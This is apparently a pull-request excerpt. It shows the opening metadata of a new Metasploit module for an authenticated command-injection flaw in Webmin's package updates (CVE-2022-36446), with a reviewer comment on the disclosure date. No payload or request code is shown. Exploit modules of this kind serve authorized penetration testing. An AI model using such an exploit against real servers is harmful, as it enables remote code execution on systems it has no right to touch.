modules/exploits/linux/http/webmin_package_updates_rce.rb

```diff
@@ -0,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Webmin Package Updates RCE',
+        'Description' => %q{
+          This module exploits an arbitrary command injection in Webmin
+          versions prior to 1.997.
+
+          Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform
+          package updates and installation. Due to a lack of input
+          sanitization, it is possibe to inject arbitrary command that will be
+          concatenated to the package manager call.
+
+          This exploit requires authentication and the account must have access
+          to the Software Package Updates module.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Christophe De La Fuente', # MSF module
+          'Emir Polat' # Discovery and PoC
+        ],
+        'References' => [
+          [ 'EDB', '50998' ],
+          [ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'],
+          [ 'CVE', '2022-36446']
+        ],
+        'DisclosureDate' => '2022-07-26',
```

Comment:
I couldn't find any advisory on Webmin web site, so this is the original blog post date.